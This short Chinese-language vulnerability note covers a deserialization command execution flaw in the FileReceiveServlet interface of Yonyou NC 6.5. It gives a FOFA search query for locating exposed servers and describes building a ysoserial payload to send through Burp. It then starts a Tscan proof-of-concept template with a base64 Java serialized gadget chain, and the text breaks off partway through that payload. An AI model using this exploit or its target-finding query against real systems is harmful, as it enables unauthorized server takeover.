漏洞描述
用友nc6.5版本FileReceiveServlet接口存在反序列化命令执行漏洞,通过此漏洞可获取服务器权限。
漏洞复现
fofa语法:title="YONYOUNC"
使用yso生成反序列化数据后构造数据包由burp提交,生成回显判断漏洞是否存在。
TscanPoc
params: []
name: yonyou_NC_FileReceiveServlet_RCE
set:
poc: base64Decode(b'rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhb